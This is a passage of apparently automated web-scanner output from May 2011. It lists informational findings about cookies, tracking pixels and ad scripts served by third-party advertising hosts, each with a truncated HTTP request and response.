GET /reservations/customize Host: disneycruise.disney.go Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=854018943 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:41 GMT Set-Cookie: DCL_POOL=1;path=/; Set-Cookie: dcl_i_persistence=H Content-Length: 63930 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_tc=Y |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=20110515192708 Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:33:20 GMT Server: lighttpd/1.4.18 Content-Length: 382 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://gannett.gcion.com |
Path: | /addyn/3.0/5111.1/809051 |
GET /addyn/3.0/5111.1/809051 Host: gannett.gcion.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 200 OK Connection: close Server: Adtech Adserver Cache-Control: no-cache P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT" Content-Type: application/x-javascript Content-Length: 942 Set-Cookie: JEB2=4DD077236E651A4 rubSect = ""; if (window.location.pathname else if (window.location.pathname else if (window.location.pathname ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://https.edge.ru4.com |
Path: | /smartserve/ad |
GET /smartserve/ad?placement Host: https.edge.ru4.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AG-00000001389358554 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://https Pragma: No-Cache Cache-Control: private, no-cache="Set-Cookie" Set-Cookie: ru4.1320=1#2656#0#2656=ad Content-Type: text/html Date: Mon, 16 May 2011 01:38:37 GMT Connection: close document.write("<img src=\"http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://i.w55c.net |
Path: | /ping_match.gif |
GET /ping_match.gif?ei Host: i.w55c.net Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wfivefivec=ea5c094a-3a81 |
HTTP/1.1 302 Found Set-Cookie: wfivefivec=ea5c094a-3a81 X-Version: DataXu Pixel Tracker v3 Cache-Control: private Location: http://image2.pubmatic Server: Jetty(6.1.22) Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | http://idcs.interclick |
Path: | /Segment.aspx |
GET /Segment.aspx?sid Host: idcs.interclick.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 70 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: sgm=9622=734271; domain=.interclick.com; expires=Sat, 15-May-2021 20:32:16 GMT; path=/ P3P: policyref="http://www Date: Sun, 15 May 2011 20:32:16 GMT GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://idpix.media6d |
Path: | /orbserv/hbpix |
GET /orbserv/hbpix?pixId=5392 HTTP/1.1 Host: idpix.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: acs=012020h1ll77mmxzt10; ipinfo=2ll77mm0zijsv |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: clid=2ll77mm01171voo Set-Cookie: orblb=2ll8nk2011y510 Set-Cookie: rdrlst=4030d6hll8nk2 Set-Cookie: sglst=2010s1jzll8nk2 Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:07 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image2.pubmatic |
Path: | /AdServer/Pug |
GET /AdServer/Pug?vcode Host: image2.pubmatic.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PUBMDCID=2; KADUSERCOOKIE=AFFBE250 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:52 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: KRTBCOOKIE_58=1344-AG Set-Cookie: PUBRETARGET=445 Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://includes.petsmart |
Path: | /homepage/redesigned |
GET /homepage/redesigned Host: includes.petsmart.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: ARPT=JOLQUPS172.16.96 Date: Mon, 16 May 2011 01:39:25 GMT Server: Apache Last-Modified: Fri, 27 Mar 2009 22:11:50 GMT ETag: "86c00f-78-4662104f59580" Accept-Ranges: bytes Content-Length: 120 Content-Type: image/gif GIF89a.......;Y....m.... |
Severity: | Information |
Confidence: | Certain |
Host: | http://includes.petsmart |
Path: | /homepage/redesigned |
GET /homepage/redesigned Host: includes.petsmart.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: ARPT=JOLQUPS172.16.96 Date: Mon, 16 May 2011 01:39:24 GMT Server: Apache Last-Modified: Fri, 27 Mar 2009 22:02:41 GMT ETag: "86c00e-175-46620e43c8240 Accept-Ranges: bytes Content-Length: 373 Content-Type: image/gif GIF89a.....$..........|.. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /gateway/gw.js |
GET /gateway/gw.js?csid Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: udm_0=MLvv9S8JaSpnph4dB7K Last-Modified: Mon, 16 May 2011 01:25:49 GMT Cache-Control: max-age=3600, private Expires: Mon, 16 May 2011 02:25:49 GMT X-Proc-ms: 0 Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:48 GMT Content-Length: 5912 //Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) var rsi_now= new Date(); var rsi_csid= 'J06575';if(typeof(csids) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://leadback |
Path: | /adcedge/lb |
GET /adcedge/lb?site=695501 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=qw280013054845430029 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:40:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=jCI0NFJwHsb0FpfqH Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Mon, 16 May 2011 02:40:51 GMT Content-Type: image/gif Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://media.fastclick |
Path: | /w/tre |
GET /w/tre?ad_id=20480;evt Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pluto2=660455823372; lyc=AwAAAARD0s9NACAA |
HTTP/1.1 302 Redirect Date: Mon, 16 May 2011 01:40:52 GMT Location: http://www.googleads P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV' Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/plain Content-Length: 0 Set-Cookie: lyc=BAAAAARD0s9NACAA Set-Cookie: pluto=660455823372; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT |
Severity: | Information |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /utils/get |
GET /utils/get?url=http%3A%2F Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _lvs2="uaMqgoSgWEtsUDbY |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: obuid=8212382c-a920-4555 Cache-Control: no-cache Pragma: no-cache Set-Cookie: tick=1305508801726; Domain=.outbrain.com; Path=/ P3P: policyref="http://www Set-Cookie: _lvs2="uaMqgoSgWEtsUDbY Set-Cookie: _lvd2="e0MjrHqXH8wCQ Set-Cookie: _rcc2=NXlRX9sMiunRtm Set-Cookie: recs-d05ceaa5e98919d Content-Type: text/x-json;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:20:01 GMT Content-Length: 5695 outbrain_rater.retur ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /utils/ping.html |
GET /utils/ping.html?random=0 Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: obuid=8212382c-a920-4555 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: obuid=8212382c-a920-4555 Cache-Control: no-cache Pragma: no-cache Accept-Ranges: bytes ETag: W/"158-1304265382000" Last-Modified: Sun, 01 May 2011 15:56:22 GMT Content-Type: text/html Content-Length: 158 Date: Mon, 16 May 2011 01:19:52 GMT <html> <head> <META HTTP-EQUIV="Cache-Control <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> </head> <body> </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/dk.js |
GET /a/dk.js?defaulting_ad Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2146=xn7ja41kw4n |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:21:49 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4462/5032; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=2; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110290; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3179363.js^2 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 1279 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3179363" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://p.brilig.com |
Path: | /contact/bct |
GET /contact/bct?pid=21008FFD Host: p.brilig.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache,no-store,must Content-Type: text/plain Date: Mon, 16 May 2011 01:24:05 GMT Expires: Mon, 19 Dec 1983 01:24:05 GMT Location: http://tag.admeld.com P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Pragma: no-cache Server: Apache/2.2.16 (Ubuntu) Set-Cookie: BriligContact=98af0ff8 X-Brilig-D: D=2965 Content-Length: 0 Connection: keep-alive |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /D08734/a1/0/0/0.gif |
GET /D08734/a1/0/0/0.gif?D=DM Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: udm_0=MLv39S8JaSpnph4dB7K X-Proc-ms: 0 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:27:05 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /E06560/b3/0/3/0902121 |
GET /E06560/b3/0/3/0902121 Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: rtc_kCmS=MLsvrdMvcT5 X-Proc-ms: 18 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:24:03 GMT Content-Length: 699 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=['E06560_10273 var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.* ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /E06560/b3/0/3/0902121 |
GET /E06560/b3/0/3/0902121 Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_6axN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: rtc_2CEm=MLuBq44HAVp X-Proc-ms: 1 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:33:41 GMT Content-Length: 699 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=['E06560_10273 var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.* ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /J06575/a4/0/0/pcx.js |
GET /J06575/a4/0/0/pcx.js Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 X-Proc-ms: 1 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:11 GMT Content-Length: 671 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=[]; var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.* ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /J06575/b3/0/3/1003161 |
GET /J06575/b3/0/3/1003161 Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: NETSEGS_G07608=82f49 Set-Cookie: rtc_ErQC=MLuBq44HAVp X-Proc-ms: 41 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:15 GMT Content-Length: 729 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=['J06575_50735 var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.repl ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.33across.com |
Path: | /ps/ |
GET /ps/?pid=454&uid Host: pixel.33across.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 33x_ps=u%3D7836807683 |
HTTP/1.1 200 OK P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA' Set-Cookie: 33x_ps=u%3D7836807683 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 01-Jan-70 00:00:01 GMT X-33X-Status: 0 Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:29:34 GMT Connection: close Server: 33XG1 GIF89a.............!... ...,...........L..; |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /data_sync |
GET /data_sync?partner_id=9 HTTP/1.1 Host: pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: exchange_uid="eyI0Ij |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:27:00 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Mon, 16-May-2011 01:26:40 GMT Content-Type: text/html Pragma: no-cache Cache-Control: no-cache Set-Cookie: dp_rec="{\"3\": 1305509220+ \"2\": 1305508826}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:27:00 GMT; Path=/ Content-Length: 512 <html> <body> <script type="text/javascript"> makePixelRequest("http:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.mathtag.com |
Path: | /event/img |
GET /event/img?mt_id=101281 Host: pixel.mathtag.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dd07bc8-e97b-118c |
HTTP/1.1 200 OK Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x4128 16680 Cache-Control: no-cache Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Mon, 16 May 2011 01:40:50 GMT Etag: 4dd07bc8-e97b-118c-3dec Connection: Keep-Alive Set-Cookie: ts=1305510050; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:40:50 GMT Content-Length: 43 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /pixel |
GET /pixel;r=2010864181;fpan Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: mc=4d529fca-2c7e4-2f739 |
